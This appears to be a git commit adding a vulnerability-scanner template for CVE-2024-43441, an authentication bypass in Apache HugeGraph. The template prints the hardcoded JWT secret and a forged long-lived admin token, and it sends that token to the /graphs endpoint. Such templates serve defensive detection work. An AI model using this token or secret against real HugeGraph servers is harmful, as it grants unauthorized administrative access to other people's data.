feat(http/cves): add CVE-2024-43441 HugeGraph auth bypass

heonju · heonju · commit 41fb459e21d2 · 2025-08-25T20:02:01.000+09:00
diff --git a/http/cves/2024/CVE-2024-43441.yaml b/http/cves/2024/CVE-2024-43441.yaml
@@ -0,0 +1,42 @@
+id: CVE-2024-43441
+
+info:
+  name: Apache HugeGraph - Authentication Bypass via Hardcoded JWT Secret
+  author: wn147
+  severity: critical
+  description: |
+    Apache HugeGraph uses a hardcoded JWT secret key ('FXQXbJtbCLxODc6tGci732pkH1cyf8Qg')
+    when authentication is enabled but 'auth.token_secret' is not configured.
+    An attacker can use this default key to generate valid JWT tokens and bypass authentication.
+  reference:
+    - https://github.com/advisories/GHSA-f697-gm3h-xrf9
+    - https://github.com/apache/incubator-hugegraph/commit/03b40a52446218c83e98cb43020e0593a744a246
+  classification:
+    cve-id: CVE-2024-43441
+    cwe-id: CWE-798
+  tags: cve,cve2024,hugegraph,auth-bypass,jwt,hardcoded
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/graphs"
+
+    headers:
+      # Using a hardcoded token(long time)
+      Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX25hbWUiOiJhZG1pbiIsInVzZXJfaWQiOiItMzA6YWRtaW4iLCJleHAiOjIwNzE0NzY4MzB9.vb193qf4xpIPFcmCN8J0sRwqUaoS2RAUvFx9uLC-I7Q
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        part: body
+        words:
+          - '"graphs":'
+          - '"hugegraph"'
+        condition: and
+      - type: word
+        part: header
+        words:
+          - "application/json"
